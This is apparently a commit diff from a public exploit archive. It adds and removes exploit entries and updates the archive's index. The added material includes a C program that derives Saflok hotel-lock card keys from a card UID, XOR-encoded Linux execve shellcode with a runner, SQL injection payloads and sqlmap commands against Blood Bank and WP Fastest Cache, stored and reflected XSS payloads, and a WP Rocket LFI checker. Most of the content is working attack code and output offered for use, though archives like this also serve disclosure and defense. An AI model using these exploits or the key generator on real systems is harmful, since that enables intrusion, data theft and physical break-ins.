DB: 2024-02-29

13 changes to exploits/shellcodes/ghdb Saflok - Key Derication Function Exploit (shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] Academy LMS 6.2 - Reflected XSS Blood Bank v1.0 - Multiple SQL Injection Moodle 4.3 - Reflected XSS TASKHUB-2.8.8 - XSS-Reflected WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - _Dashboard Redirect_ field Stored Cross-Site Scripting (XSS) WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection WP Rocket < 2.10.3 - Local File Inclusion (LFI)
2024-02-29 00:16:26 +00:00 · 2024-02-29 00:16:26 +00:00 · 59f10b7f45
commit 59f10b7f45
parent c1bcfc6347
10 changed files with 492 additions and 91 deletions
--- a/exploits/hardware/local/51832.c
+++ b/exploits/hardware/local/51832.c
@ -0,0 +1,63 @@
 // Exploit Title: Saflok KDF
 // Date: 2023-10-29
 // Exploit Author: a51199deefa2c2520cea24f746d899ce
 // Vendor Homepage: https://www.dormakaba.com/
 // Version: System 6000
 // Tested on: Dormakaba Saflok cards
 // CVE: N/A
 #include <stdio.h>
 #include <stdint.h>
 #define MAGIC_TABLE_SIZE 192
 #define KEY_LENGTH 6
 #define UID_LENGTH 4
 int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);
        return 1;
    }
    uint8_t magic_table[MAGIC_TABLE_SIZE] = {
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,
                    0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0
    };
    uint8_t uid[UID_LENGTH];
    sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]);
    uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);
    uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;
    uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};
    uint8_t carry_sum = 0;
    for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) {
        uint16_t keysum = key[i] + magic_table[magickal_index];
        key[i] = (keysum & 0xFF) + carry_sum;
        carry_sum = keysum >> 8;
    }
    printf("Generated Key: ");
    for (int i = 0; i < KEY_LENGTH; i++) {
        printf("%02X", key[i]);
    }
    printf("\n");
    return 0;
 }
--- a/exploits/linux/local/51834.c
+++ b/exploits/linux/local/51834.c
@ -0,0 +1,112 @@
 # Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]
 # Shellcode Author: Alexys (0x177git)
 # Tested on: Linux (x86_64)
 # Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh))
 # Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram
 # Original code:
 [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm)
 ---- Assembly code ----
 section .text
 global _start
 _start:
 xor eax, eax
 xor edx, edx ; clear rdx (argv on execve() protoype)
 mov qword [rsp-32], 0x7466684b ;
 mov qword [rsp-28],0x60650b1d ; encrypted(/bin//sh) 0x60, 0x65, 0xb, 0x1d, 0x74, 0x66, 0x68, 0x4b
 xor qword [rsp-32], 0x1a0f0a64
 xor qword [rsp-28], 0x08162432 ; passwd 0x8, 0x16, 0x24, 0x32, 0x1a, 0xf, 0xa, 0x64
 lea rdi, [rsp-32]
 push rax ; end of string
 push rdi ; send string to stack
 mov rsi, rsp ; send address of RSP to rsi -> (arg on linux syscall architecture convection) || execve(rsi, rdx)
 ; call execve()
 mov al, 0x3b
 syscall
 -
 - - - shellcode execution using stack in c (
 gcc -z execstack shellcode.c -o shellcode
 ) ----
 /*
 "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05"
 ;
 */
 void
 main
 ()
 {
 const
 char
 shellcode
 []
 =
 "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05"
 ;
 void
 (
 *
 f
 )()
 =
 (
 void
 (
 *
 )())
 shellcode
 ;
 f
 ();
 }
--- a/exploits/php/webapps/51757.txt
+++ b/exploits/php/webapps/51757.txt
@ -1,40 +0,0 @@
 # Exploit Title: Academy LMS 6.2 - Reflected XSS
 # Exploit Author: CraCkEr
 # Date: 29/08/2023
 # Vendor: Creativeitem
 # Vendor Homepage: https://creativeitem.com/
 # Software Link: https://demo.creativeitem.com/academy/
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 # CVE: CVE-2023-4973
 # CWE: CWE-79 - CWE-74 - CWE-707
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 The attacker can send to victim a link containing a malicious URL in an email or instant message
 can perform a wide variety of actions, such as stealing the victim's session token or login credentials
 Path: /academy/tutor/filter
 GET parameter 'searched_word' is vulnerable to XSS
 GET parameter 'searched_tution_class_type[]' is vulnerable to XSS
 GET parameter 'searched_price_type[]' is vulnerable to XSS
 GET parameter 'searched_duration[]' is vulnerable to XSS
 https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]
 XSS Payload:
 acoa5"><script>alert(1)</script>dyzs0
 [-] Done
--- a/exploits/php/webapps/51782.txt
+++ b/exploits/php/webapps/51782.txt
@ -1,29 +0,0 @@
 ## Title: TASKHUB-2.8.8-XSS-Reflected
 ## Author: nu11secur1ty
 ## Date: 09/22/2023
 ## Vendor: https://codecanyon.net/user/infinitietech
 ## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
 ## Reference: https://portswigger.net/web-security/cross-site-scripting
 ## Description:
 The value of the JSON parameter within the project parameter is copied
 into the HTML document as plain text between tags. The payload
 vn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSON
 parameter within the project parameter. This input was echoed
 unmodified in the application's response. The already authenticated
 (by using a USER ACCOUNT)attacker can get a CSRF token and cookie
 session it depends on the scenarios.
 [+]Test exploit:
 surw7%3Cscript%3Ealert(1)%3C%2fscript%3E
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)
 ## Proof and Exploit:
 [href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 home page: https://www.nu11secur1ty.com/
--- a/exploits/php/webapps/51821.txt
+++ b/exploits/php/webapps/51821.txt
@ -1,19 +0,0 @@
 # Exploit Title: Moodle 4.3 Reflected XSS
 # Date: 21/10/2023
 # Exploit Author: tmrswrr
 # Vendor Homepage: https://moodle.org/
 # Software Demo: https://school.moodledemo.net/
 # Version: 4.3
 # Tested on: Linux
 Vulnerability Details
 ======================
 Steps :
 1. Log in to the application with the given credentials > USER: teacher PASS: moodle
 2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=
 3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3
 4. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"
 5. You will be see alert button
--- a/exploits/php/webapps/51830.py
+++ b/exploits/php/webapps/51830.py
@ -0,0 +1,67 @@
 Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.
 https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
 https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
 Exploit :
 #Code By E1.Coders
 #Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
 Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
 import requests
 import time
 def check_wp_rocket_version(url):
     version_url = url + "/wp-rocket/css/rocket.css"
     try:
         response = requests.get(version_url)
         version = response.headers["X-Powered-By"]
         if "WP Rocket/" in version:
             version = version.split("/")[1]
             return version
     except Exception as e:
         print(f"Error occurred while fetching WP Rocket version: {e}")
     return None
 def test_wp_rocket_lfi_bug(url):
     lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
     try:
         response = requests.get(lfi_url)
         if response.status_code == 200:
             return True
     except Exception as e:
         print(f"Error occurred while testing LFI: {e}")
     return False
 def main():
     url = "http://arvatools.com"
     wp_rocket_version = check_wp_rocket_version(url)
     if wp_rocket_version:
         print(f"WP Rocket Version: {wp_rocket_version}")
         if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
             result = test_wp_rocket_lfi_bug(url)
             if result:
                 print("LFI vulnerability found in WP Rocket")
             else:
                 print("LFI vulnerability not found in WP Rocket")
         else:
             print("WP Rocket version is not affected by the LFI bug")
     else:
         print("Unable to fetch WP Rocket version")
 if __name__ == "__main__":
     main()
--- a/exploits/php/webapps/51831.txt
+++ b/exploits/php/webapps/51831.txt
@ -0,0 +1,22 @@
 # Exploit Title:  WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field  Stored Cross-Site Scripting (XSS)
 # Google Dork: NA
 # Date: 28/10/2023
 # Exploit Author: Rachit Arora
 # Vendor Homepage:
 # Software Link:  https://wordpress.org/plugins/admin-bar-dashboard-control/
 # Version: 1.2.8
 # Category: Web Application
 # Tested on: Windows
 # CVE : 2023-47184
 1. Install WordPress (latest)
 2. Install and activate Admin Bar & Dashboard Access Control.
 3. Navigate to "Admin Bar & Dash"  >> Under Dashboard Access and in the "Dashboard Redirect" enter the payload into the input field.
 "onfocusin=alert``+autofocus>
 "onfocusin=alert`document.domain`+autofocus>
 4. You will observe that the payload successfully got stored  and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
--- a/exploits/php/webapps/51833.txt
+++ b/exploits/php/webapps/51833.txt
@ -0,0 +1,174 @@
 # Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability
 # Date: 2023-11-14
 # Exploit Author: Ersin Erenler
 # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
 # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
 # Version: 1.0
 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
 # CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018
 -------------------------------------------------------------------------------
 1. Description:
 The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
 Vulnerable File: /hospitalLogin.php
 Parameter Names: hemail, hpassword
 2. Proof of Concept:
 ----------------------
 Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database:
 sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
 SQLMap Response:
 ----------------------
 Parameter: hemail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
 -------------------------------------------------------------------------------
 1. Description:
 The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
 Vulnerable File: /receiverLogin.php
 Parameter Names: remail, rpassword
 2. Proof of Concept:
 ----------------------
 Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:
 sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
 sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db
 SQLMap Response:
 ----------------------
 ---
 Parameter: remail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
 ---
 ---
 Parameter: rpassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
 ---
 -------------------------------------------------------------------------------
 # Description:
 The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
 Vulnerable File: /receiverReg.php
 Parameter Name: remail
 # Proof of Concept:
 ----------------------
 1. Save the POST request of receiverReg.php to a request.txt file
 ---
 POST /bloodbank/file/receiverReg.php HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
 Content-Length: 877
 Origin: http://localhost
 Connection: close
 Referer: http://localhost/bloodbank/register.php
 Cookie: PHPSESSID=<some-cookie-value>
 Upgrade-Insecure-Requests: 1
 Sec-Fetch-Dest: document
 Sec-Fetch-Mode: navigate
 Sec-Fetch-Site: same-origin
 Sec-Fetch-User: ?1
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rname"
 test
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rbg"
 A+
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rcity"
 test
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rphone"
 05555555555
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="remail"
 test@test
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rpassword"
 test123
 -----------------------------2653697510272605730288393868
 Content-Disposition: form-data; name="rregister"
 Register
 -----------------------------2653697510272605730288393868--
 ---
 2. Execute sqlmap using 'remail' parameter to retrieve the current database:
 sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
--- a/exploits/php/webapps/51835.txt
+++ b/exploits/php/webapps/51835.txt
@ -0,0 +1,48 @@
 # Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
 # Date: 14.11.2023
 # Exploit Author: Meryem Taşkın
 # Vendor Homepage: https://www.wpfastestcache.com/
 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/
 # Version: WP Fastest Cache 1.2.2
 # Tested on: WP Fastest Cache 1.2.2
 # CVE: CVE-2023-6063
 ## Description
 An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 ## Vuln Code
 public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
                    break;
                }
            }
            if(isset($username) && $username){
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
                                       .....
 ## Exploit
 GET / HTTP/1.1
 Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
 Host: meryem.local
 ## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
 ---
 ## References
 - [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
 - [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
 - [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 ## Credits
 - Original Researcher: Alex Sanford
 - PoC: Meryem Taşkın
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3274,6 +3274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
 41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
 32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
 51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
 20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
 21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
 21001,exploits/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (3)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-10,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
@ -6801,6 +6802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27425,exploits/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",dos,linux,,2014-03-12,2014-03-12,0,CVE-2006-1269;OSVDB-23934,,,,,https://www.securityfocus.com/bid/17126/info
 43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,,2017-12-18,2017-12-21,1,CVE-2017-15049,,,,,https://raw.githubusercontent.com/convisoappsec/advisories/master/2017/CONVISO-17-003.txt
 43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)",2017-12-18,Conviso,dos,linux,,2017-12-18,2017-12-21,1,CVE-2017-15048,"Buffer Overflow",,,,https://raw.githubusercontent.com/convisoappsec/advisories/master/2017/CONVISO-17-002.txt
 51834,exploits/linux/local/51834.c,"(shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]",2024-02-28,"Alexys (0x177git)",local,linux,,2024-02-28,2024-02-28,0,,,,,,
 2492,exploits/linux/local/2492.s,".ELF Binaries - Local Privilege Escalation",2006-10-08,Sha0,local,linux,,2006-10-07,,1,,,,,,
 23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux,,2004-02-02,2016-09-06,1,CVE-2004-0238;OSVDB-6928,,,,,https://www.securityfocus.com/bid/9550/info
 36747,exploits/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",local,linux,,2015-04-14,2016-10-27,1,CVE-2015-3315;CVE-2015-1862;OSVDB-120804,,,,,
@ -13363,7 +13365,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 51757,exploits/php/webapps/51757.txt,"Academy LMS 6.2 - Reflected XSS",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 51758,exploits/php/webapps/51758.txt,"Academy LMS 6.2 - SQL Injection",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
@ -14959,6 +14960,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
 51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
@ -23664,7 +23666,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-05,lanz,webapps,php,,2021-08-05,2021-08-05,0,,,,,,
